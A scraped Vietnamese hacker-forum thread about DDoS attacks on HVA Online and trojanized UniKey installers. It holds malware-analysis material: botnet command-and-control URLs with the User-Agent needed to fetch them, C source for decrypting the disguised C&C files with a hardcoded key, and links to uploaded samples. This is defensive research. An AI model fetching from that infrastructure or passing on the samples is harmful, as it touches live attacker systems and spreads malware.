Tụi stl code bot ồ ạt mà quên nguyên tắc "secure coding", muốn làm bot crash thì dể lắm đấy .lht. à ! Nhưng máy của victim crash chứ có phải máy tụi nó đâu, nên tụi nó "đông ke" ! 
Ohm ... Chắc lại sơ hở phần đọc reponse trả về dẫn đến crash dạng bufferflow và treo luôn máy :)) ]]>
/hvaonline/posts/list/39641.html#244613 /hvaonline/posts/list/39641.html#244613 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244614 /hvaonline/posts/list/39641.html#244614 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244684 /hvaonline/posts/list/39641.html#244684 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244685 /hvaonline/posts/list/39641.html#244685 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

tanviet12 wrote:
Bản tải link nào chứ mình download trên Unikey.org và scan bằng virustotal đâu phát hiện "mèo què" hay '"tròi gián" nào đâu. Kết quả: http://www.virustotal.com/file-scan/report.html?id=aba5c0bff0442597ff8743b4fe7d28de945b78be01eb88fc4a95cadd1fbee409-1312691552  
Hix.Mình quên nói rõ là bản này mình tải lâu rồi, gần 3 tháng rồi. Nhưng chắc chắn là mình đã tải ở Unikey.org. Chắc có lẽ bên đó đã update bản mới. Mình không biết đây có phải là STL không nên mình cứ up lên cho các anh test xem thử.]]>
/hvaonline/posts/list/39641.html#244688 /hvaonline/posts/list/39641.html#244688 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

whitesnow19 wrote:
Hix.Mình quên nói rõ là bản này mình tải lâu rồi, gần 3 tháng rồi. Nhưng chắc chắn là mình đã tải ở Unikey.org. Chắc có lẽ bên đó đã update bản mới. Mình không biết đây có phải là STL không nên mình cứ up lên cho các anh test xem thử. 
Chưa bao giờ có bản Unikey Vista cả, bạn hãy vào trực tiếp trang Unikey.org down lại nhé. Bản Unikey Vista là bản mod lại từ code của Unikey 3.6 (hoặc nếu không nhầm thì còn cũ hơn). Đừng là người tiếp tay cho STL khi không bao giờ down soft từ chính homepage!]]>
/hvaonline/posts/list/39641.html#244692 /hvaonline/posts/list/39641.html#244692 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

Vanxuanemp wrote:

whitesnow19 wrote:
Hix.Mình quên nói rõ là bản này mình tải lâu rồi, gần 3 tháng rồi. Nhưng chắc chắn là mình đã tải ở Unikey.org. Chắc có lẽ bên đó đã update bản mới. Mình không biết đây có phải là STL không nên mình cứ up lên cho các anh test xem thử. 
Chưa bao giờ có bản Unikey Vista cả, bạn hãy vào trực tiếp trang Unikey.org down lại nhé. Bản Unikey Vista là bản mod lại từ code của Unikey 3.6 (hoặc nếu không nhầm thì còn cũ hơn). Đừng là người tiếp tay cho STL khi không bao giờ down soft từ chính homepage! 
Xin lỗi bạn nhé! Có vẻ như bạn chưa đọc kỹ bài viết của mình. Trong bài viết ghi rõ là mình tải bản Unikey4RC tại trang chủ. Trong phần comment trên mình chỉ giải thích cho bạn trên hiểu là bản đó mình đã tải lâu rồi. Chỉ vì muốn nhờ các anh giúp phân tích xem thử có phải virus STL nên mình mới post lên đây. Có gì không phải bạn bỏ qua nhé ]]>
/hvaonline/posts/list/39641.html#244693 /hvaonline/posts/list/39641.html#244693 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244694 /hvaonline/posts/list/39641.html#244694 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

whitesnow19 wrote:
Không biết có phải em lo xa không mà hôm nay vừa đọc xong bài viết của các anh, em liền test thằng Unikey Vista em đang dùng. Kết quả scan trên virusTotal ra là 1/40 nhưng không biết có phải có em bé không. Các anh xem qua giúp em:  

whitesnow19 wrote:
Xin lỗi bạn nhé! Có vẻ như bạn chưa đọc kỹ bài viết của mình. Trong bài viết ghi rõ là mình tải bản Unikey4RC tại trang chủ. Trong phần comment trên mình chỉ giải thích cho bạn trên hiểu là bản đó mình đã tải lâu rồi. Chỉ vì muốn nhờ các anh giúp phân tích xem thử có phải virus STL nên mình mới post lên đây. Có gì không phải bạn bỏ qua nhé [/qoute] Có mâu thuẩn gì ở đây không??]]> /hvaonline/posts/list/39641.html#244695 /hvaonline/posts/list/39641.html#244695 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244697 /hvaonline/posts/list/39641.html#244697 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
PS: Làm cái gì mà căm danlambaovn.blogspot.com thế, DDOS hoài không chán à ? 
Em tự hỏi, blogspot của Google thì làm sao mà stl "đốt" nổi , mà "đốt" mãi thế?]]>
/hvaonline/posts/list/39641.html#244698 /hvaonline/posts/list/39641.html#244698 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244704 /hvaonline/posts/list/39641.html#244704 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244707 /hvaonline/posts/list/39641.html#244707 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

crc32 wrote:

TQN wrote:
PS: Làm cái gì mà căm danlambaovn.blogspot.com thế, DDOS hoài không chán à ? 
Em tự hỏi, blogspot của Google thì làm sao mà stl "đốt" nổi , mà "đốt" mãi thế? 
Đến Google MJ nó còn Đốt cho đơ gần 1 ngày liền, huống chi là blogspot của Google. tiếc là sờ ti lợn chưa đủ trình và tiếng thôi.]]>
/hvaonline/posts/list/39641.html#244708 /hvaonline/posts/list/39641.html#244708 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244710 /hvaonline/posts/list/39641.html#244710 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244716 /hvaonline/posts/list/39641.html#244716 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244718 /hvaonline/posts/list/39641.html#244718 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244719 /hvaonline/posts/list/39641.html#244719 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

mylove14129 wrote:
còn đây là bản unikey mới nhất trên trang chủ http://www.virustotal.com/file-scan/report.html?id=cf8773ccfb08010e71134d2096831afd37d52113f402daac90ea717900fc2f8a-1312767260 Khả năng dự đoán của mình là đúng. Quả này thì "khó" rồi 
Ở trên trang chủ của UniKey ( unikey.org ) không có file nào là Uk40BSetup.exe, chỉ có ver 3 mới có file setup ( .exe ) còn ver 4 chỉ là file zip mà thôi. không biết bro lấy từ trang chủ nào ? PS : Xin mấy bro đừng chém gió tránh loãng chủ đề !!!]]>
/hvaonline/posts/list/39641.html#244720 /hvaonline/posts/list/39641.html#244720 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244721 /hvaonline/posts/list/39641.html#244721 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 wrote:

mylove14129 wrote:
còn đây là bản unikey mới nhất trên trang chủ http://www.virustotal.com/file-scan/report.html?id=cf8773ccfb08010e71134d2096831afd37d52113f402daac90ea717900fc2f8a-1312767260 Khả năng dự đoán của mình là đúng. Quả này thì "khó" rồi 
Ở trên trang chủ của UniKey ( unikey.org ) không có file nào là Uk40BSetup.exe, chỉ có ver 3 mới có file setup ( .exe ) còn ver 4 chỉ là file zip mà thôi. không biết bro lấy từ trang chủ nào ? PS : Xin mấy bro đừng chém gió tránh loãng chủ đề !!! 
Mình vừa down từ trang chủ đó http://www.unikey.org/. click vào Download UniKey 4.0 here link sang forum của unikey http://www.unikey.org/forum/viewtopic.php?t=1541, bấm vào cái UniKey 4.0 Standard Setup, for all Windows rồi chờ down từ source force nhé P/S to mv1098 : nếu PS trên của bạn dành cho mình thì bạn nên tìm hiểu kỹ trước khi cm lại cho người khác. ]]>
/hvaonline/posts/list/39641.html#244722 /hvaonline/posts/list/39641.html#244722 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244723 /hvaonline/posts/list/39641.html#244723 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244724 /hvaonline/posts/list/39641.html#244724 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

angel_of_devil wrote:
@all: e thấy bác conmale bảo Symantec chưa update mấy mẫu bác ý gửi. Em vào trang chủ Symantec check thì có vẻ vẫn chưa update, mà công ty thì xài SEPM :( Có cách nào để thằng Symantec sớm tỉnh ngộ ko các bác nhỉ? 
Cách làm cho Symantec "tỉnh ngộ" là cách than phiền chính thức đến nó với vị thế khách hàng. Ví dụ, cứ nói với nó là bồ dùng Symantec và antivirus này không detect ra virus. Trong khi đó, dùng Avira thì Avira lại tóm được. Nói thêm với nó là nhiều người đã submit mẫu đến Symantec nhưng Symantec làm ngơ. Để cho đủ đô, doạ nó là công ty của bồ sẽ không dùng Symantec nữa nếu như Symantec vẫn có thái độ như vậy. Hù cái gì chớ hù vô túi tiền thì bố cu cậu nào cũng ngán :-) .]]>
/hvaonline/posts/list/39641.html#244727 /hvaonline/posts/list/39641.html#244727 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244728 /hvaonline/posts/list/39641.html#244728 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

angel_of_devil wrote:
Ok anh, em sẽ thử xem "tốc độ" reply của Symantec nhanh đến cỡ nào :)) 
Trong các antivirus thì tốc độ đón nhận, phân tích, xử lý và cập nhật virus def phải nói là: 1) Avira dẫn đầu. 2) Clamav đứng thứ nhì. 3) Sophos đứng thứ ba. 4) Microsoft đứng thứ tư. 5) McAfee đứng thứ năm. Các nhóm còn lại thì rất lê thê, đàng đệ. Nhóm tệ nhất là nhóm Symantec. Có lẽ tụi này bự quá nên... "nâu ke" ;).]]>
/hvaonline/posts/list/39641.html#244729 /hvaonline/posts/list/39641.html#244729 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244730 /hvaonline/posts/list/39641.html#244730 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244731 /hvaonline/posts/list/39641.html#244731 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

sourcefire wrote:
hic hôm nay đọc được bài này, kiểm tra lại file unikey của mình và download lại từ trên trang chủ về thì thấy dung lượng khác nhau, kiểm tra trên virustotal thì được report thế này, không biết có phải của STL không nữa: http://www.virustotal.com/file-scan/report.html?id=9852b3c19f9cca4aa35c16f2cc54911a54c0aa7d13d232fa5adb6a62918260dc-1312720738 Đây là nguyên mẫu file unikey, nhờ các bạn kiểm tra xem phải của STL không? http://www.megaupload.com/?d=FLM02K3G File này mình nhớ là trước đây cũng down từ trang chủ unikey, nhưng không biết là có phải thực sự bị dính STL không nữa. 
Tôi đã download bản Unikey từ link trên và mở ra xem qua. Tôi chưa có thời gian thử nghiệm thưc tế và phân tích version của Unikey này. Tuy nhiên xét về "hình thức' các file, thì dường như nó giống như bản Unikey mà bạn axasin trước đây đã cung cấp, mà tôi đã kiểm tra và phân tích. Vì vậy nó có khả năng cũng bị nhiễm virus của STL. Chiêu nay (nếu HVA forum không bị DDoS) tôi sẽ post lên chi tiết kiểm tra thưc tế Malicious Unikey mà bạn axasin đã gửi trước đây. Có nhiều điểm lý thú và kết quả kiểm tra thưc tế giúp ta trả lời được nhiều điểm còn thắc mắc, như vấn đề liên quan đến các file MsHelpCenter.* chẳng hạn. Xin các bạn đón đọc ]]>
/hvaonline/posts/list/39641.html#244732 /hvaonline/posts/list/39641.html#244732 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244733 /hvaonline/posts/list/39641.html#244733 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:
Chiêu nay (nếu HVA forum không bị DDoS) tôi sẽ post lên chi tiết kiểm tra thưc tế Malicious Unikey mà bạn axasin đã gửi trước đây. Có nhiều điểm lý thú và kết quả kiểm tra thưc tế giúp ta trả lời được nhiều điểm còn thắc mắc, như vấn đề liên quan đến các file MsHelpCenter.* chẳng hạn. Xin các bạn đón đọc  
Em chỉ mong có bấy nhiêu à! Lời hứa của một Admin luôn có giá trị.Trình độ IT của em thì bằng dê rô nhưng em lại thích đọc những phân tích của các bác, đọc những bài phân tích của bác Conmale, "TQN= Than Quảng Ninh", PXMMRF em thấy sáng ra nhiều điều, sáng ở đây là từ một người mù có người cầm tay chỉ cho mình hướng đi nhưng đi đâu thì mình chưa biết vì mình đang " mù" mà. Đi đâu thì đi giữ cho mình một chữ "TÂM" là được.:P]]>
/hvaonline/posts/list/39641.html#244735 /hvaonline/posts/list/39641.html#244735 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

angel_of_devil wrote:
Ok anh, em sẽ thử xem "tốc độ" reply của Symantec nhanh đến cỡ nào :)) 
Trong các antivirus thì tốc độ đón nhận, phân tích, xử lý và cập nhật virus def phải nói là: 1) Avira dẫn đầu. 2) Clamav đứng thứ nhì. 3) Sophos đứng thứ ba. 4) Microsoft đứng thứ tư. 5) McAfee đứng thứ năm. Các nhóm còn lại thì rất lê thê, đàng đệ. Nhóm tệ nhất là nhóm Symantec. Có lẽ tụi này bự quá nên... "nâu ke" ;). 
Hức hức ... Tuy ko phải fan của Bác Quảng Nổ nhưng em cũng chẳng anti Quảng Nổ vì em cũng cài Bkav Pro. Thấy mẫu nào trên diễn đàn các bác up lên em thấy Bkav chém hết :( Bác comale xếp vị trí cho công ty anh ý cái :D ]]>
/hvaonline/posts/list/39641.html#244737 /hvaonline/posts/list/39641.html#244737 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

ptv_vbhp wrote:

conmale wrote:

angel_of_devil wrote:
Ok anh, em sẽ thử xem "tốc độ" reply của Symantec nhanh đến cỡ nào :)) 
Trong các antivirus thì tốc độ đón nhận, phân tích, xử lý và cập nhật virus def phải nói là: 1) Avira dẫn đầu. 2) Clamav đứng thứ nhì. 3) Sophos đứng thứ ba. 4) Microsoft đứng thứ tư. 5) McAfee đứng thứ năm. Các nhóm còn lại thì rất lê thê, đàng đệ. Nhóm tệ nhất là nhóm Symantec. Có lẽ tụi này bự quá nên... "nâu ke" ;). 
Hức hức ... Tuy ko phải fan của Bác Quảng Nổ nhưng em cũng chẳng anti Quảng Nổ vì em cũng cài Bkav Pro. Thấy mẫu nào trên diễn đàn các bác up lên em thấy Bkav chém hết :( Bác comale xếp vị trí cho công ty anh ý cái :D  
Tớ không có ý "xếp loại" công ty software antiviruses của Việt Nam. CMClab thì đã có người theo dõi và cập nhật virus def khá đều đặn rồi, còn BKIS thì tớ nhận nhiều phản hồi trái ngược nhau. Tớ thì không có BKIS "bờ rồ" để thử nghiệm cho nên không thể đánh giá nó được.]]>
/hvaonline/posts/list/39641.html#244739 /hvaonline/posts/list/39641.html#244739 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

ptv_vbhp wrote:
Hức hức ... Tuy ko phải fan của Bác Quảng Nổ nhưng em cũng chẳng anti Quảng Nổ vì em cũng cài Bkav Pro. Thấy mẫu nào trên diễn đàn các bác up lên em thấy Bkav chém hết :( Bác comale xếp vị trí cho công ty anh ý cái :D  
Nhân viên của bác Quang hỏi ở đây nhiều lắm, Bác ý không tranh thủ những phân tích ở đây thì sao xứng danh là Quang hỏi nô hỏi được. Tui mà là thầy bói,nhà ngoại cảm tui cũng đưa chân rết đến tận tận cùng đất nước ấy chứ. Forum này không đưa lính vào cũng phí tâm cơ :D.]]>
/hvaonline/posts/list/39641.html#244740 /hvaonline/posts/list/39641.html#244740 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244741 /hvaonline/posts/list/39641.html#244741 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244742 /hvaonline/posts/list/39641.html#244742 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Hu hu bà con ơi ! Ai giúp giùm em cái, mẫu mới của tụi stl mà em âm thầm RCE nó mấy ngày nay thì tới giờ, sau khi có kết quả, không lòi ra bằng chứng nào là mẫu đó là bot đang DDOS HVA ta ! Nó cứ đè danlambao.blogspot mà phang !  
Kể cả có xác định được thì anh nghĩ có dập được không ạ ? Tốc độ cập nhật của các hãng av còn lâu hơn cả tụi nó update biến thể "mới". Lại thêm chuyện thử hỏi có bao nhiêu người biết được mình đang bị nhiễm và chương trình diệt virus trên máy họ có thể diệt được trước khi một mẫu mới được cập nhật. Mà chả hiểu sao cánh báo chí im ru bà rù thế nhỉ ?]]>
/hvaonline/posts/list/39641.html#244746 /hvaonline/posts/list/39641.html#244746 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:
Hôm qua có anh bạn ghé thăm làm vài chai. Anh ấy hỏi tại sao hiện tượng DDoS rộng lớn và dai dẳng xảy ra như vậy mà các cơ quan hữu trách vẫn hoàn toàn im lặng? Tớ đớ lưỡi, không trả lời được câu hỏi này. Đây cũng là câu hỏi TQN và nhiều member đã lặp đi lặp lại nhiều lần. Hiện nay đám STL vẫn tiếp tục hì hụi tạo botnet khác và vẫn loay hoay với những biến thái mới cho con zombie đã có sẵn trong các máy con bị nhiễm malware. Ở Việt Nam có bao nhiêu nhóm kỹ thuật, có bao nhiêu cơ quan hữu trách, có bao nhiêu người dùng biết đến tình trạng này? Cách đây không lâu, vietnamnet bị tấn công dai dẳng và rồi mọi chuyện chìm lỉm. Tại sao? Chẳng lẽ không có ai biết được hoặc không có khả năng truy tìm và chấm dứt những hoạt động phi pháp này hay sao? HVA đã đưa ra quá nhiều bằng chứng và thông tin cần thiết, việc còn lại đối với các cơ quan hữu trách có lẽ chẳng phải là việc khó khăn gì (ngoại trừ không muốn làm hoặc vì lý do nào khác thì không cần phải bàn). 
Chú conmale, vietnamnet.vn bị ddos, báo chí có thông tin, nhưng nói không điều tra ra được nguồn gốc tấn công(không biết thật hay giả nữa), người dân đen như chúng cháu không có thông tin nhiều, cứ nghĩ bị bọn THAHùng chơi khâm chứ. Còn hvaonline.net bị ddos có đăng trên một số diễn đàn nổi tiếng như: hvaonline.net, forums.congdongcviet.com, ddth.com, diendantinhoc.vn, vn-zoom.com, ... có đăng về tình trạng ddos hva này, vậy mà không thấy báo chí, cơ quan 2n nào DÁM NÓI, THẬT BẤT CÔNG. Cháu thường vào topic này và xem " Thông báo: về việc diễn đàn HVA bị gián đoạn sáng nay 14/7/2011"(khi HVA không bị ddos) để biết cách và cũng như nói cho mọi người biết về cách mà các anh và các chú HVA hướng dẫn để diệt malware STL( em cũng tìm Unikey và Winrar kô bị nhiễm malware, đã test trên virustotal gửi link cho mọi người). Thật may là các IP của Cty và ở nhà cháu không có trong danh sách IP ddos HVA. :) GIEO GÌ THÌ GẶT NẤY, MÌNH KHÔNG GẶT THÌ CON CHÁU MÌNH SẼ GẶT THAY CHO MÌNH ĐÓ MẤY ANH STL ẠH. MẤY ANH PHẢI NGHĨ CHO TƯƠNG LAI CON CHÁU CỦA MÌNH NỮA CHỨ, KHÔNG LẺ VÌ MÌNH MÀ CON CHÁU MÌNH PHẢI GÁNH CHỊU HẾT SAO. :-( QUAY ĐẦU LỜ BỜ MẤY ANH STL ƠI. WELCOME CÁC ANH TRỞ VỀ CHÍNH NGHĨA.]]>
/hvaonline/posts/list/39641.html#244753 /hvaonline/posts/list/39641.html#244753 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Hu hu bà con ơi ! Bạn Here I am up lại file java update của bạn giúp, có thể là mẫu mới của stl ! Gấp nhé ! Cảm ơn bạn !  
đây bác ạ http://www.mediafire.com/?cgoo6id0e9qn0]]>
/hvaonline/posts/list/39641.html#244755 /hvaonline/posts/list/39641.html#244755 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
http://net.iadze.com/backgrounds.jpg
 http://net.iadze.com/fronts.jpg

 http://find.instu.net/backgrounds.jpg
 http://find.instu.net/fronts.jpg
Các server này dùng nginx, nếu các bạn download bình thường bằng trình duyệt thì sẽ không được. Các bạn nên dùng wget, Fiddler, putty... để down với User-Agent phải là:
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13  
Sau khi download về, các bạn chạy ct DecodeJPG.exe mà tui đã up ở đây để giải mã file .jpg đó ra thành file .gz, rồi dùng 7Zip hay WinRAR, WinZip mở ra. Trong file nén đó sẽ có file text chứa thông tin DDOS: Code của DecodeJPG: Code:
//---------------------------------------------------------------------------

#pragma hdrstop

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#pragma argsused

//---------------------------------------------------------------------------

int GetOneXorByte(LPINT arrXor)
{
    int value1 = (arrXor[256] + 1) % 256;
    arrXor[256] = value1;

    int value2 = (arrXor[260] + arrXor[value1]) % 256;
    arrXor[260] = value2;

    int value3 = arrXor[value1];
    arrXor[value1] = arrXor[value2];
    arrXor[value2] = value3;
    return arrXor[(arrXor[arrXor[256]] + arrXor[arrXor[260]]) % 256];
}

int main(int argc, char* argv[])
{
    FILE *fIn = NULL;
    FILE *fOut = NULL;

    LPBYTE pJPGContent = NULL;
    LPBYTE pszData = NULL;
    BOOL bRetVal = FALSE;

    char szFileOut[MAX_PATH] = { '\0' };
    int arrXor[261] = { 0 };

    const char szKey[] = "0fb6f2f2dac443fd8beb5df3be320d36";
    int keyLen = strlen(szKey);

    printf("//-----------------------------------------------------------------------------------------\n");
    printf("// DecodeJPG: Decode the JPG files which are STL's DDOS C&C files\n");
    printf("// JPG files downloaded from the http://net.iadze.com/xxx.jpg and http://find.instu.net/xxx.jpg\n");
    printf("// RCE and coding by TQN (ThangCuAnh) - HVA Online Forum: www.hvaonline.net\n");
    printf("//-----------------------------------------------------------------------------------------\n\n");

    if (argc < 2)
    {
        printf("Usage: DecodeJPG JPGFile [Output File]");
        return EXIT_FAILURE;
    }

    char *szFileIn = argv[1];
    if (argc == 2)
    {
        char szDrive[_MAX_DRIVE] = { 0 };
        char szDir[_MAX_DIR] = { 0 } ;
        char szFName[_MAX_FNAME] = { 0 };
        _splitpath(szFileIn, szDrive, szDir, szFName, NULL);
        _makepath(szFileOut, szDrive, szDir, szFName, ".gz");
    }
    else
    {
        strncpy(szFileOut, argv[2], MAX_PATH);
    }

    fIn = fopen(szFileIn, "rb");
    if (NULL == fIn)
    {
        printf("Can not open input file: %s\n", szFileIn);
        return EXIT_FAILURE;
    }

    do
    {
        int i, value1, value2;

        fOut = fopen(szFileOut, "wb");
        if (NULL == fOut)
        {
            printf("Can not open output file %s\n", szFileOut);
            break;
        }

        fseek(fIn, 0, SEEK_END);
        int iJPGSize = ftell(fIn);
        fseek(fIn, 0, SEEK_SET);

        pJPGContent = (LPBYTE) malloc(iJPGSize);
        if (NULL != pJPGContent)
        {
            fread(pJPGContent, iJPGSize, 1, fIn);
        }
        else
        {
            printf("Not enought memory !\n");
            break;
        }

        pszData = (LPBYTE) malloc(iJPGSize);
        if (NULL == pszData)
        {
            printf("Nout enought memory for output buffer\n");
            break;
        }

        // Init arrXor
        for (i = 0; i < 256; ++i)
        {
            arrXor[i] = i;
        }
        arrXor[256] = arrXor[260] = 0;

        // Shuffle arr256
        while (1)
        {
            i = arrXor[256];
            if (i >= 256)
                break;
            value1 = (arrXor[260] + arrXor[i] + szKey[i % keyLen]) % 256;
            arrXor[260] = value1;
            value2 = arrXor[i];
            arrXor[i] = arrXor[value1];
            arrXor[value1] = value2;
            ++arrXor[256];
        }
        arrXor[256] = arrXor[260] = 0;

        // Xor loop
        for (i = 0; i < iJPGSize; ++i)
        {
            value1 = GetOneXorByte(arrXor);
            value2 = pJPGContent[i] ^ value1;
            pszData[i] = value2;
        }

        fwrite(pszData, iJPGSize, 1, fOut); // ghi lai noi dung da giai ma

        printf("Decode and extract data from JPG file %s to %s OK !\n", szFileIn, szFileOut);

        bRetVal = TRUE;
    } while (0);


    fclose(fIn);
    if (NULL != fOut)
    {
        fclose(fOut);
    }

    if (NULL != pJPGContent)
    {
        free(pJPGContent);
    }

    if (NULL != pszData)
    {
        free(pszData);
    }

    return bRetVal ? EXIT_SUCCESS : EXIT_FAILURE;
}
//---------------------------------------------------------------------------
Một số EXE, source C++, script của 010 Hex Editor để decode, extract data từ các "mèo què" của STL tui post ở đây: http://www.mediafire.com/?5g7r7c8eme0wjp2 ]]>
/hvaonline/posts/list/39641.html#244756 /hvaonline/posts/list/39641.html#244756 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Hu hu bà con ơi ! Ai giúp giùm em cái, mẫu mới của tụi stl mà em âm thầm RCE nó mấy ngày nay thì tới giờ, sau khi có kết quả, không lòi ra bằng chứng nào là mẫu đó là bot đang DDOS HVA ta ! Nó cứ đè danlambao.blogspot mà phang ! Không lý thằng AcrobatUpdater.exe vẫn còn sống ? Hay có 1 bot mới, server mới của tụi stl ???????????? Mong bà con tình nguyện tiếp tục dùng SmartSniffs, WireShark monitor xem thằng .exe nào đang connect tới HVA ta: www.hvaonline.net (74.63.219.12, 88.198.119.5, 49.212.30.177). PS: Tội nghiệp danlambao.blogspot.com: đang trong mục tiêu nhắm DDOS và phá hoại của tụi stl xấu xa này. Bà con nào cảnh báo chủ blog danlambao giùm ! Bạn Here I am up lại file java update của bạn giúp, có thể là mẫu mới của stl ! Gấp nhé ! Cảm ơn bạn ! Nếu chúng ta không xác định, tìm được con nằm vùng trên máy victim, con bot mới được down ở đâu về, và server mới nào của tụi nó ra lệnh DDOS, thì HVA chúng ta sẽ phải chịu DDOS dài dài, và mạng bot net mà tụi nó xây dựng ở VN ta sẽ ngày càng phình to ! Tới lúc nào đó mọi máy tính của VN đều là Zombie của tụi chó stl này hết ! (sorry anh em nhé, em bực quá rồi, tụi này mặt dày lắm, chửi vậy cũng chưa ăn thua đâu. Tụi nó còn tiếp tục chơi cái trò dơ bẩn, hèn hạ này hoài.) 
Theo như anh conmale thông báo thì những ngày gần đây mạng zombies tấn công vào HVA chủ yếu là đặt ở nước ngoài. Như vậy là các user ở nước ngoài đã từng download về máy họ các software hay tool nào đó phổ biến, thông dụng và cần dùng ở nước đó, nhưng bị nhiễm virus của cấp trên của STL. Chúng sử dụng các Master webserver-website cũng đặt ở nước ngoài để update các bot, cho tấn công vào HVA. Chỉ có một số nhỏ zombies đặt ở VN. Nhưng có lẽ những zombie này đã nhiễm STL virus từ lâu. Sau đó chúng được update để tấn công vào HVA cũng đã từ lâu và hiện nay chúng không được newly updated, nên cứ giữ configuration để tấn công vào HVA. Vì vậy việc tìm ra Master- webserver hiện nay sẽ trở nên rất khó. Thôi thì ta phải mầy mò, cố gắng tìm hiểu, phân tích thêm vây. Qua sự việc này chúng ta thấy người thiết lập và điều khiển mang bot ở nước ngoài (và đang cho tấn công vào HVA) rõ ràng không phải là các chú nhỏ VN, làm thuê cho STL hay các thành phần người VN trong nhóm STL. Chúng phải là các thành viên "quốc tế" của một tổ chức là cấp trên của STL, lãnh đạo STL. Nhiều khả năng là các bác người Hoa sống ở nước ngoài. ]]>
/hvaonline/posts/list/39641.html#244757 /hvaonline/posts/list/39641.html#244757 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

Here i am wrote:

TQN wrote:
Hu hu bà con ơi ! Bạn Here I am up lại file java update của bạn giúp, có thể là mẫu mới của stl ! Gấp nhé ! Cảm ơn bạn !  
đây bác ạ http://www.mediafire.com/?cgoo6id0e9qn0 
Cả 6 file bạn gửi đều không phải virus bạn nhé, file sạch cả đấy ;) .]]>
/hvaonline/posts/list/39641.html#244758 /hvaonline/posts/list/39641.html#244758 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.
]]>
/hvaonline/posts/list/39641.html#244760 /hvaonline/posts/list/39641.html#244760 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244761 /hvaonline/posts/list/39641.html#244761 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

tmd wrote:
Báo điện tử, chuyên trang vi tính, số..., toàn quảng cáo công nghệ hay thiết bị, tin tức. Chuyện phá hoại có chủ đích tới 1 2 cá nhân như hiện tại báo ta không đưa rầm rộ và đều đặn. Cái gì không muốn cho người ta biết thì không cho đăng.  
Nói gì mà không trúng không trật gì hết! Thôi đừng nói! Úp úp mở mở cuối cùng chẳng ra được ý gì hết! Báo điện tử là báo nào? "Báo ta" là báo nào? "1 2 cá nhân" là sao?]]>
/hvaonline/posts/list/39641.html#244766 /hvaonline/posts/list/39641.html#244766 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244767 /hvaonline/posts/list/39641.html#244767 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:
Qua sự việc này chúng ta thấy người thiết lập và điều khiển mang bot ở nước ngoài (và đang cho tấn công vào HVA) rõ ràng không phải là các chú nhỏ VN, làm thuê cho STL hay các thành phần người VN trong nhóm STL. Chúng phải là các thành viên "quốc tế" của một tổ chức là cấp trên của STL, lãnh đạo STL. Nhiều khả năng là các bác người Hoa sống ở nước ngoài.  
